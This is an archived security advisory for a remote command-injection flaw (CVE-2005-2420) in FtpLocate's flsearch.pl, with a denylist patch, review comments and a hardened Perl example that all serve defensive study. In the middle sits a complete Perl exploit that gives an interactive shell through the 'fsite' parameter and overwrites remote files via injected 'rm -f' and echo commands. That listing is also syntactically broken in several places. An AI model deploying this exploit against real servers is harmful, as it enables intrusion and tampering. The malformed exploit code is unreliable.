SecurityTracker.com
Category:  Application (Generic)  >  FtpLocate
Vendors:  NCKU Taiwan
FtpLocate Lets Remote Users Execute Arbitrary Commands
SecurityTracker Alert ID:  1014570
SecurityTracker URL:  http://securitytracker.com/id?1014570
CVE Reference:  CVE-2005-2420
Updated:  Jul 6 2008
Original Entry Date:  Jul 25 2005
Impact:  Execution of arbitrary code via network, User access via network
Exploit Included:  Yes  
Version(s): 2.02
Description:  A vulnerability was reported in FtpLocate. A remote user can execute arbitrary commands on the target system.

The 'flsearch.pl' script does not properly validate user-supplied input in the 'fsite' parameter. A remote user can supply a specially crafted parameter value to execute arbitrary commands on the target system. The commands will run with the privileges of the target web service.

The vendor was notified on July 15, 2005.

Chroot Security reported this vulnerability.

Impact:  A remote user can execute arbitrary commands on the target system with the privileges of the target web service.
Solution:  No solution was available at the time of this entry.
Vendor URL:  turtle.ee.ncku.edu.tw/ftplocate/readme.english.html
Cause:  Input validation error
Underlying OS:  Linux (Any), UNIX (Any), Windows (Any)
Reported By:  newbug@securityfocus.com
Message History:   None.


 Source Message Contents

Date:  Mon, 25 Jul 2005 02:31:59 +0000
From:  newbug@securityfocus.com
Subject:  Chroot Security Group Advisory 2005-07-25 -- ftplocate

 

Chroot Security Group Advisory  2005-07-25
        
Remote arbitrary code execution in FtpLocate 2.02 (current)
        
Summary:
FtpLocate is an FTP search engine supporting filename and description search.
A remote attacker can run arbitrary commands with the web server's privileges by
exploiting an unfiltered parameter in flsearch.pl.
        
Details:
FtpLocate contains a vulnerability that can allow an attacker to execute
arbitrary commands. The vulnerability is due to improper input validation of
the user-supplied 'fsite' parameter by the flsearch.pl script. Remote attackers
can run arbitrary commands with the web server's privileges by adding a "|"
or ";".

Vuln. Systems:
FtpLocate 1.5 - 2.02

Vuln. Code:
---
/ftplocate-2.02/bin/flsearch.pl : # line 23 - 60

    $fsite=clean_str($input{'fsite'});
    $fsite_raw=CGI::escape($fsite);
    ...
    if ( $fsite eq "" ) {
        ...
    } else {
        $resultfname=$query_raw."-$fsite";
        ...
    }
    ...
    open (L, "$CACHEDIR/$resultfname"); # Game Over 1

---
/ftplocate-2.02/bin/flsearch.pl: # line 53

    do_flsearch($client, $query, $fsite, $resultfname);

/ftplocate-2.02/bin/flmodule.pl: # line 526 - 537

    if ( $fsite eq "" ) {
        ...
    } else {
        $optf="-F '$fsite'"; # for glimpse
        ...
    }
    # line 537
    open(G, "$CMD_GLIMPSE -i -Ny $optf $optw -H $FILELISTDIR -e '$q' 2>/$TMPDIR/flsearch.tmp.$$|"); # Game Over 2

---
/ftplocate-2.02/bin/flmodule.pl: # line 584

    `$CMD_AGREP -i -e '$q' $setlist_str /dev/null>'$CACHEDIR/$resultfname'`; # Game Over 3

---
/ftplocate-2.02/bin/flmodule.pl: # line 589

    `$CMD_AGREP -i -e '$q' $setlist_str /dev/null>'$CACHEDIR/$resultfname'`; # Game Over 4

---
Unofficial Patch:

diff -urN flsearch.pl.orig flsearch.pl
--- flsearch.pl.orig	2005-07-22 17:48:52.502670968 +0800
+++ flsearch.pl	2005-07-22 17:56:00.979532584 +0800
@@ -20,7 +20,10 @@
 $starttime=gettimeofday();
 $starttimestr=timestr();
 $query=clean_str($input{'query'});
 $query_raw=CGI::escape($query);
-$fsite=clean_str($input{'fsite'}); $fsite_raw=CGI::escape($fsite);
+$fsite=clean_str($input{'fsite'});
+# dangerous characters
+$fsite =~ s/[\/\"\'\`\|\<\>\\\(\)\[\]\{\}\$\s;&]//g;
+$fsite_raw=CGI::escape($fsite);
 $page=$input{'page'};
 $client=ip2fqdn(client_ip());

Vendor Response:
2005.07.15 Vendor notified via email.
2005.07.19 Vendor notified via email, again.
2005.07.25 No response. Advisory released.

Exploit Code:

    #!/usr/bin/perl
    # FtpLocate <= 2.02 (current) remote exploit
    # VERY PRIVATE VERSION
    # DO NOT DISTRIBUTE
    # newbug Tseng [at] chroot.org

    sub my_socket {
        my $s=IO::Socket::INET->new(PeerAddr => $host, PeerPort => 80, Proto => "tcp") or die "socket: ";

    sub ch2hex {
        $chr = $_[0];
        $out="";
        for($i=0;$i<length($chr);$i++) {
            $ch = substr($chr,$i,1);
            if($ch eq "\"") { $out.="%5c%22"; }
            elsif($ch eq "\$") { $out.="%5c%24"; }
            elsif($ch eq "\@") { $out.="%5c%40"; }
            else { $out.="%".sprintf("%2.2x",ord($ch)); }
        }
        $out;

    sub upload_file {
        print "local file: "; chomp($lfile = <STDIN>);
        print "remote file: "; chomp($rfile = <STDIN>);
        my $socket = &my_socket($host);
        print $socket "GET $cgi?query=xx\&fsite=|rm%20-f%20$rfile| $junk";
        close $socket;
        print "remove $host:$rfile done.\n";
        my @DATA = `cat $lfile`;
        $num=1;
        $total = scalar @DATA;
        foreach $DATA (@DATA) {
            $DATA = &ch2hex($DATA);
            my $socket = &my_socket($host);
            print $socket "GET $cgi?query=xx\&fsite=|echo%20\"$DATA\"%20>>$rfile| $junk";
            print "Send lfile \"$lfile\" to $host:$rfile ... ($num/$total)\n";
            sleep(1);
            close $socket;
            $num++;
        }
    }

    use IO::Socket::INET;
    print "FtpLocate flsearch.pl remote exploit\n";
    print "host: "; chomp ($host = <STDIN>);
    print "port (80): "; chomp ($port = <STDIN>); if($port eq "") { $port = 80; }
    print "version 1.0/1.1 (1.0): "; chomp ($ver = <STDIN>); if($ver eq "") { $ver = "1.0";
    print "cmd/upload (cmd): "; chomp ($opt = <STDIN>); if($opt eq "") { $opt = "cmd";
    print "cgi path (/cgi-bin/ftplocate/flsearch.pl): "; chomp ($cgi = <STDIN>); if($cgi eq "") { $cgi = "/cgi-bin/ftplocate/flsearch.pl";
    if($ver eq "1.0") { $junk = "HTTP/1.0\n\n"; else $junk = "HTTP/1.1\nHost: $host\nUser-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.4) Gecko/20030624 Netscape/7.1\nAccept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,video/x-mng,image/png,image/jpeg,image/gif;q=0.2,*/*;q=0.1\nAccept-Language: zh-tw,en-us;q=0.7,en;q=0.3\nAccept-Encoding: gzip,deflate\nAccept-Charset: Big5,utf-8;q=0.7,*;q=0.7\nKeep-Alive: 300\nConnection: keep-alive\n\n"; }
    if($opt eq "cmd") while(1){
        print "h4ck3r\@[$host]:~\$ "; chomp ($cmd = <STDIN>);
        if($cmd ne "") {
            print "Send command \"$cmd\" to $host ...\n";
            $socket = &my_socket($host);
            $cmd =~ s/\s/%20/g;
            print $socket "GET $cgi?query=xx\&fsite=|$cmd| $junk";
            print "done.\n";
        }
    } elsif($opt eq "upload") { &upload_file($lfile); print "done.\n";
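Review bot: the unofficial flsearch.pl hunk above sanitizes $fsite with a denylist, s/[\/\"\'\`\|\<\>\\\(\)\[\]\{\}\$\s;&]//g, which silently strips characters instead of rejecting the request; since a valid fsite is a host name, an allowlist such as /^[A-Za-z0-9.-]+$/ that returns an error on mismatch is stronger and easier to audit. The patch also filters only at the flsearch.pl entry point, while the four sinks quoted in the Vuln. Code section (the two-argument open(L, "$CACHEDIR/$resultfname"), the open(G, "... -F '$fsite' ... -e '$q' ... |") pipe, and the two agrep backtick calls in flmodule.pl) still build shell command strings from interpolated variables; converting them to three-argument open and list-form open/system removes the shell from the path rather than relying on one caller filtering one parameter. Finally, the hunk does not show what clean_str() removes from $query, so whether $q is safe inside -e '$q' cannot be judged from this diff alone.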


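The following is an added example written for this archive entry; it is not FtpLocate's code and not the advisory author's patch. It shows a hardened counterpart to the sinks quoted in the advisory: an allowlist check on 'fsite' that rejects rather than strips, a three-argument open for the cache file, and list-form pipe opens for glimpse and agrep so that no shell ever parses the interpolated values. The variable names follow the advisory; the directory and binary paths, the helper names and the sample inputs are assumptions.

```perl
#!/usr/bin/perl
# Added example, not FtpLocate's own code: a hardened version of the
# 'fsite' handling and of the three kinds of sink named in the advisory
# (two-argument open of a cache file, a piped open of glimpse, and a
# backtick agrep command). Variable names mirror the advisory; the paths
# and the sample inputs below are assumptions.
use strict;
use warnings;

my $CACHEDIR    = '/var/cache/ftplocate';   # assumed location
my $FILELISTDIR = '/var/lib/ftplocate';     # assumed location
my $CMD_GLIMPSE = '/usr/bin/glimpse';       # assumed binary path
my $CMD_AGREP   = '/usr/bin/agrep';         # assumed binary path

# Allowlist rather than denylist: an FTP site is a host name, so accept
# only letters, digits, '.' and '-', not starting or ending with '-' or
# '.', and reject everything else instead of silently stripping it.
sub valid_fsite {
    my ($fsite) = @_;
    return 0 unless defined $fsite && length $fsite && length $fsite <= 253;
    return $fsite =~ /\A[A-Za-z0-9](?:[A-Za-z0-9.-]*[A-Za-z0-9])?\z/ ? 1 : 0;
}

# Cache file names are derived from user input, so forbid path
# separators and anything outside a small character set before the
# name is joined to $CACHEDIR.
sub valid_resultfname {
    my ($name) = @_;
    return defined $name && $name =~ /\A[A-Za-z0-9._%-]+\z/ ? 1 : 0;
}

# Three-argument open with an explicit '<' mode. Unlike
# open(L, "$CACHEDIR/$resultfname"), a trailing '|' in the name is a
# character in a file name here, never a pipe to a command.
sub read_cached_result {
    my ($resultfname) = @_;
    die "invalid result file name\n" unless valid_resultfname($resultfname);
    open(my $fh, '<', "$CACHEDIR/$resultfname") or return undef;
    local $/;                       # slurp the whole file
    my $data = <$fh>;
    close $fh;
    return $data;
}

# List-form pipe open: each element of @cmd goes straight to execve(),
# so no shell parses $fsite or $q. Compare the advisory's
# open(G, "$CMD_GLIMPSE ... -F '$fsite' ... -e '$q' ...|").
sub glimpse_search {
    my ($q, $fsite) = @_;
    die "invalid fsite\n" if $fsite ne '' && !valid_fsite($fsite);
    my @cmd = ($CMD_GLIMPSE, '-i', '-Ny');
    push @cmd, '-F', $fsite if $fsite ne '';
    push @cmd, '-H', $FILELISTDIR, '-e', $q;
    open(my $g, '-|', @cmd) or die "cannot run glimpse: $!\n";
    my @lines = <$g>;
    close $g;
    return \@lines;
}

# Replacement for the backtick agrep call: a list-form pipe open, with
# the output redirection done by Perl on a validated file name instead
# of by a shell parsing ">'$CACHEDIR/$resultfname'".
sub agrep_to_cache {
    my ($q, $resultfname, @setlist) = @_;
    die "invalid result file name\n" unless valid_resultfname($resultfname);
    open(my $out, '>', "$CACHEDIR/$resultfname") or die "cannot write cache: $!\n";
    open(my $in, '-|', $CMD_AGREP, '-i', '-e', $q, @setlist, '/dev/null')
        or die "cannot run agrep: $!\n";
    print {$out} $_ while <$in>;
    close $in;
    close $out;
    return 1;
}

# Constructed inputs, including the two metacharacters the advisory names.
for my $candidate ('ftp.example.org', 'ftp.example.org|', 'a;b', '-bad', 'x.') {
    printf "%-18s %s\n", $candidate, valid_fsite($candidate) ? 'accepted' : 'rejected';
}
```

Running it prints which of the constructed candidate values pass the allowlist (only 'ftp.example.org' does); the search helpers are only exercised when glimpse and agrep exist at the assumed paths. The point of the list-form open is that the argument boundaries are fixed by the program, so a value containing "|" or ";" is passed to glimpse or agrep as data and is never interpreted as a command separator.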
Copyright 2007, SecurityGlobal.net LLC